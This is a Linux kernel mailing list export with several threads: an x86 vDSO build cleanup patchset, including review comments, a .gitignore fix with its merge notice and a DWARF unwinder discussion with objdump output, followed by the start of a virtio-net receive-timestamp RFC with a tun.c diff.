arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On Tue, 6 Jan 2026 13:18:36 -0800 "H. Peter Anvin" <hpa@zytor.com> wrote:
Hi everyone,
I ran the tip master branch through my AI review prompts and this one was
flagged. These look right to me, apologies if it's noise:
[ ... ]
^^^^^^^
Should this be "-fno-PIE" with the leading dash? The other flags in this
line all have the dash prefix, but "fno-PIE" is missing it. Without the
dash, filter-out won't match the actual compiler flag.
^^^^^^^^^^^^^^^^^
Is GCC_PLUGIN_CFLAGS the right variable name here? The kbuild system
defines GCC_PLUGINS_CFLAGS (with an 's') in scripts/Makefile.gcc-plugins.
Other vDSO Makefiles (arm64, sparc, arm) use GCC_PLUGINS_CFLAGS. Without
the fix, gcc plugin flags won't be filtered out when CONFIG_GCC_PLUGINS=y.
[ ... ]
^^^^^^^^^^^^^^^^^^^^^
Should this be CONFIG_X86_USER_SHADOW_STACK? The Kconfig symbol is defined
as "config X86_USER_SHADOW_STACK" and kbuild exposes it as a CONFIG_
prefixed variable. The next lines show the pattern:
Both of these correctly use the CONFIG_ prefix. Without it, the shadow
stack cf-protection flag will never be added to vDSO builds even when
CONFIG_X86_USER_SHADOW_STACK=y.
|
{
"author": "Chris Mason <clm@meta.com>",
"date": "Thu, 15 Jan 2026 19:58:02 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
From: "Borislav Petkov (AMD)" <bp@alien8.de>
Date: Tue, 27 Jan 2026 23:09:13 +0100
The commit
a76108d05ee1 ("x86/entry/vdso: Move vdso2c to arch/x86/tools")
moved vdso2c to arch/x86/tools/ and commit
93d73005bff4 ("x86/entry/vdso: Rename vdso_image_* to vdso*_image")
renamed .so files but also dropped vdso2c from
arch/x86/entry/vdso/.gitignore.
It should've moved it to arch/x86/tools/.gitignore instead.
Do that.
Signed-off-by: Borislav Petkov (AMD) <bp@alien8.de>
---
arch/x86/tools/.gitignore | 1 +
1 file changed, 1 insertion(+)
diff --git a/arch/x86/tools/.gitignore b/arch/x86/tools/.gitignore
index d36dc7cf9115..51d5c22b38d7 100644
--- a/arch/x86/tools/.gitignore
+++ b/arch/x86/tools/.gitignore
@@ -1,2 +1,3 @@
# SPDX-License-Identifier: GPL-2.0-only
relocs
+vdso2c
--
2.51.0
--
Regards/Gruss,
Boris.
https://people.kernel.org/tglx/notes-about-netiquette
|
{
"author": "Borislav Petkov <bp@alien8.de>",
"date": "Tue, 27 Jan 2026 23:16:33 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: ce9b1c10c3f1c723c3cc7b63aa8331fdb6c57a04
Gitweb: https://git.kernel.org/tip/ce9b1c10c3f1c723c3cc7b63aa8331fdb6c57a04
Author: Borislav Petkov (AMD) <bp@alien8.de>
AuthorDate: Tue, 27 Jan 2026 23:09:13 +01:00
Committer: Borislav Petkov (AMD) <bp@alien8.de>
CommitterDate: Tue, 27 Jan 2026 23:27:51 +01:00
x86/entry/vdso: Add vdso2c to .gitignore
The commit
a76108d05ee1 ("x86/entry/vdso: Move vdso2c to arch/x86/tools")
moved vdso2c to arch/x86/tools/ and commit
93d73005bff4 ("x86/entry/vdso: Rename vdso_image_* to vdso*_image")
renamed .so files but also dropped vdso2c from
arch/x86/entry/vdso/.gitignore.
It should've moved it to arch/x86/tools/.gitignore instead.
Do that.
Signed-off-by: Borislav Petkov (AMD) <bp@alien8.de>
Link: https://patch.msgid.link/20260127221633.GAaXk5QcG8ILa1VWYR@fat_crate.local
---
arch/x86/tools/.gitignore | 1 +
1 file changed, 1 insertion(+)
diff --git a/arch/x86/tools/.gitignore b/arch/x86/tools/.gitignore
index d36dc7c..51d5c22 100644
--- a/arch/x86/tools/.gitignore
+++ b/arch/x86/tools/.gitignore
@@ -1,2 +1,3 @@
# SPDX-License-Identifier: GPL-2.0-only
relocs
+vdso2c
|
{
"author": "\"tip-bot2 for Borislav Petkov (AMD)\" <tip-bot2@linutronix.de>",
"date": "Tue, 27 Jan 2026 22:33:30 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
Hello Peter!
On 1/6/2026 10:18 PM, H. Peter Anvin wrote:
Hopefully Glibc developers will do something similar for x86-64
__restore_rt() in Glibc sysdeps/unix/sysv/linux/x86_64/libc_sigaction.c.
...
...
Note that the "S" in "zRS" is the signal frame indication.
Your version does no longer have this nop nor does the FDE start one
byte earlier. Isn't that required for unwinders any longer?
See excerpt from dumped DWARF and disassembly for __kernel_sigreturn()
below.
...
Ditto.
Excerpt from dump of DWARF and disassembly with your patch:
$ objdump -d -Wf arch/x86/entry/vdso/vdso32/vdso32.so.dbg
...
000001cc 0000003c 00000000 CIE <-- CIE for __kernel_sigreturn
Version: 1
Augmentation: "zRS"
Code alignment factor: 1
Data alignment factor: -4
Return address column: 8
Augmentation data: 1b
DW_CFA_def_cfa: r4 (esp) ofs 4
DW_CFA_offset_extended_sf: r8 (eip) at cfa+56
DW_CFA_offset_extended_sf: r0 (eax) at cfa+44
DW_CFA_offset_extended_sf: r3 (ebx) at cfa+32
DW_CFA_offset_extended_sf: r1 (ecx) at cfa+40
DW_CFA_offset_extended_sf: r2 (edx) at cfa+36
DW_CFA_offset_extended_sf: r4 (esp) at cfa+28
DW_CFA_offset_extended_sf: r5 (ebp) at cfa+24
DW_CFA_offset_extended_sf: r6 (esi) at cfa+20
DW_CFA_offset_extended_sf: r7 (edi) at cfa+16
DW_CFA_offset_extended_sf: r40 (es) at cfa+8
DW_CFA_offset_extended_sf: r41 (cs) at cfa+60
DW_CFA_offset_extended_sf: r42 (ss) at cfa+72
DW_CFA_offset_extended_sf: r43 (ds) at cfa+12
DW_CFA_offset_extended_sf: r9 (eflags) at cfa+64
DW_CFA_nop
0000020c 00000010 00000044 FDE cie=000001cc pc=00001a40..00001a4a <-- FDE for __kernel_sigreturn
DW_CFA_advance_loc: 1 to 00001a41
DW_CFA_def_cfa_offset: 0
[ The FDE covers the range [1a40..1a4a[. Previously it would have
started one byte earlier (at the nop), so that the range would have
been [1a3f..1a4a[. This is/was required for unwinders that always
subtract one from the unwound return address, so that it points into
the instruction that invoked the function (e.g. call) instead of behind
it, in case it was invoked by a non-returning function. Such an
unwinder would now lookup IP=1a3f as belonging to int80_landing_pad (and
use the DWARF rules applicable to its last instruction) instead of
__kernel_sigreturn (and its rules). Likewise for __kernel_rt_sigreturn. ]
...
00001a3c <int80_landing_pad>:
1a3c: 5d pop %ebp
1a3d: 5a pop %edx
1a3e: 59 pop %ecx
1a3f: c3 ret
00001a40 <__kernel_sigreturn>:
1a40: 58 pop %eax
1a41: b8 77 00 00 00 mov $0x77,%eax
1a46: cd 80 int $0x80
00001a48 <vdso32_sigreturn_landing_pad>:
1a48: 0f 0b ud2
1a4a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
Excerpt without your patch:
$ objdump -d -Wf arch/x86/entry/vdso/vdso32/vdso32.so.dbg
...
000001cc 00000010 00000000 CIE <-- CIE for __kernel_sigreturn and __kernel_rt_sigreturn
Version: 1
Augmentation: "zRS"
Code alignment factor: 1
Data alignment factor: -4
Return address column: 8
Augmentation data: 1b
DW_CFA_nop
DW_CFA_nop
000001e0 00000068 00000018 FDE cie=000001cc pc=00001a6f..00001a78 <-- FDE for __kernel_sigreturn
DW_CFA_def_cfa_expression (DW_OP_breg4 (esp): 32; DW_OP_deref)
DW_CFA_expression: r0 (eax) (DW_OP_breg4 (esp): 48)
DW_CFA_expression: r1 (ecx) (DW_OP_breg4 (esp): 44)
DW_CFA_expression: r2 (edx) (DW_OP_breg4 (esp): 40)
DW_CFA_expression: r3 (ebx) (DW_OP_breg4 (esp): 36)
DW_CFA_expression: r5 (ebp) (DW_OP_breg4 (esp): 28)
DW_CFA_expression: r6 (esi) (DW_OP_breg4 (esp): 24)
DW_CFA_expression: r7 (edi) (DW_OP_breg4 (esp): 20)
DW_CFA_expression: r8 (eip) (DW_OP_breg4 (esp): 60)
DW_CFA_advance_loc: 2 to 00001a71
DW_CFA_def_cfa_expression (DW_OP_breg4 (esp): 28; DW_OP_deref)
DW_CFA_expression: r0 (eax) (DW_OP_breg4 (esp): 44)
DW_CFA_expression: r1 (ecx) (DW_OP_breg4 (esp): 40)
DW_CFA_expression: r2 (edx) (DW_OP_breg4 (esp): 36)
DW_CFA_expression: r3 (ebx) (DW_OP_breg4 (esp): 32)
DW_CFA_expression: r5 (ebp) (DW_OP_breg4 (esp): 24)
DW_CFA_expression: r6 (esi) (DW_OP_breg4 (esp): 20)
DW_CFA_expression: r7 (edi) (DW_OP_breg4 (esp): 16)
DW_CFA_expression: r8 (eip) (DW_OP_breg4 (esp): 56)
[ See how the FDE for __kernel_sigreturn covers the range [1a6f..1a78[.
An unwinder that always subtracts one from the return address would
lookup IP=1a6f as belonging to __kernel_sigreturn (and use the DWARF
rules applicable to the nop preceeding its symbol). Likewise for
__kernel_rt_sigreturn. Or is that no longer true? ]
...
00001a5c <int80_landing_pad>:
1a5c: 5d pop %ebp
1a5d: 5a pop %edx
1a5e: 59 pop %ecx
1a5f: c3 ret
1a60: 90 nop
1a61: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
1a68: 2e 8d b4 26 00 00 00 lea %cs:0x0(%esi,%eiz,1),%esi
1a6f: 00
00001a70 <__kernel_sigreturn>:
1a70: 58 pop %eax
1a71: b8 77 00 00 00 mov $0x77,%eax
1a76: cd 80 int $0x80
Thanks and regards,
Jens
--
Jens Remus
Linux on Z Development (D3303)
jremus@de.ibm.com / jremus@linux.ibm.com
IBM Deutschland Research & Development GmbH; Vorsitzender des Aufsichtsrats: Wolfgang Wendt; Geschäftsführung: David Faller; Sitz der Gesellschaft: Ehningen; Registergericht: Amtsgericht Stuttgart, HRB 243294
IBM Data Privacy Statement: https://www.ibm.com/privacy/
|
{
"author": "Jens Remus <jremus@linux.ibm.com>",
"date": "Mon, 2 Feb 2026 18:02:48 +0100",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
2. pass rx tstamp to guest, for better RTT estimation
3. pass tx tstamp to guest, idem
3. pass tx delivery time to host, for accurate pacing
All would introduce an extension to the virtio spec.
The changes in this series are to the driver side. For the changes to qemu see:
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Currently only virtio-net is supported. Performance was tested with
pktgen which doesn't show a decrease in transfer speeds.
As these patches are now mostly different from the initial patchset, I removed
the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;)
Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
Changes in v2:
- rework patches to use flow filter instead of feature flag
- Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de
---
Steffen Trumtrar (2):
tun: support rx-tstamp
virtio-net: support receive timestamp
drivers/net/tun.c | 30 +++++----
drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++----
include/uapi/linux/virtio_net.h | 9 +++
3 files changed, 151 insertions(+), 24 deletions(-)
---
base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8
change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d
Best regards,
--
Steffen Trumtrar <s.trumtrar@pengutronix.de>
|
Demonstrate support for new virtio-net features
VIRTIO_NET_HDR_F_TSTAMP
This is not intended to be merged.
A full feature test also requires a patched qemu binary that knows
these features and negotiates correct vnet_hdr_sz in
virtio_net_set_mrg_rx_bufs. See
https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps
Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de>
---
drivers/net/tun.c | 30 ++++++++++++++++++------------
1 file changed, 18 insertions(+), 12 deletions(-)
diff --git a/drivers/net/tun.c b/drivers/net/tun.c
index 8192740357a09..aa988a9c4bc99 100644
--- a/drivers/net/tun.c
+++ b/drivers/net/tun.c
@@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun,
}
if (vnet_hdr_sz) {
- struct virtio_net_hdr_v1_hash_tunnel hdr;
- struct virtio_net_hdr *gso;
+ struct virtio_net_hdr_v1_hash_tunnel_ts hdr;
+
+ memset(&hdr, 0, sizeof(hdr));
ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb,
- &hdr);
+ (struct virtio_net_hdr_v1_hash_tunnel *)&hdr);
if (ret)
return ret;
- /*
- * Drop the packet if the configured header size is too small
- * WRT the enabled offloads.
- */
- gso = (struct virtio_net_hdr *)&hdr;
- ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features,
- iter, gso);
- if (ret)
- return ret;
+ if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) {
+ __le64 tstamp = cpu_to_le64(ktime_get_ns());
+
+ hdr.tstamp_0 = (tstamp & 0x000000000000ffffULL) >> 0;
+ hdr.tstamp_1 = (tstamp & 0x00000000ffff0000ULL) >> 16;
+ hdr.tstamp_2 = (tstamp & 0x0000ffff00000000ULL) >> 32;
+ hdr.tstamp_3 = (tstamp & 0xffff000000000000ULL) >> 48;
+ }
+
+ if (unlikely(iov_iter_count(iter) < vnet_hdr_sz))
+ return -EINVAL;
+
+ if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz))
+ return -EFAULT;
}
if (vlan_hlen) {
--
2.52.0
|
{
"author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>",
"date": "Thu, 29 Jan 2026 09:06:41 +0100",
"thread_id": "willemdebruijn.kernel.16b0979449c84@gmail.com.mbox.gz"
}
|
lkml
|
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive
timestamps
|
This series tries to pick up the work on the virtio-net timestamping
feature from Willem de Bruijn.
Original series
Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com
Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp,
tx-tstamp and tx-time
From: Willem de Bruijn <willemb@google.com>
RFC for four new features to the virtio network device:
1. pass tx flow state to host, for routing + telemetry
